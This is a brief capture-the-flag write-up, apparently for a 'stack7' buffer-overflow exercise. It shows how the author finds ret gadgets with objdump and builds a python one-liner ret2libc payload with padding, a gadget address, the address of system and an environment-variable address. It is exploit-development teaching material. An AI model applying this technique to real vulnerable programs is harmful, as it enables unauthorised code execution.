This challenge is nearly identical to the last except that you must find a random ret to use and then jump to system.
Using the same tactics as before I determined the address of my environment variable was at 0xbffffe63.
Now we need is a gadget containing a RET. There are fancier, more sophisticated ways to do this, but I’m just going to use objdump.
objdump -D stack7 | grep -E ‘pop\s*%e[a-d]x’ -A5 | grep ret -B1
8048382: c9 leave
8048383: c3 ret
8048493: 5d pop %ebp
8048494: c3 ret
80485c8: 5d pop %ebp
80485c9: c3 ret
80485f8: 5d pop %ebp
80485f9: c3 ret
8048616: c9 leave
8048617: c3 ret
As it happens there are a few! I decided to go with the one at 0x08048383.
python -c ‘print “A”*80 + “\x83\x83\x04\x08” + “\xb0\xff\xec\xb7” + “A”*4 + “\x6c\xfe\xff\xbf”‘
And that works just fine!
It prints the word NONSENSE as expected.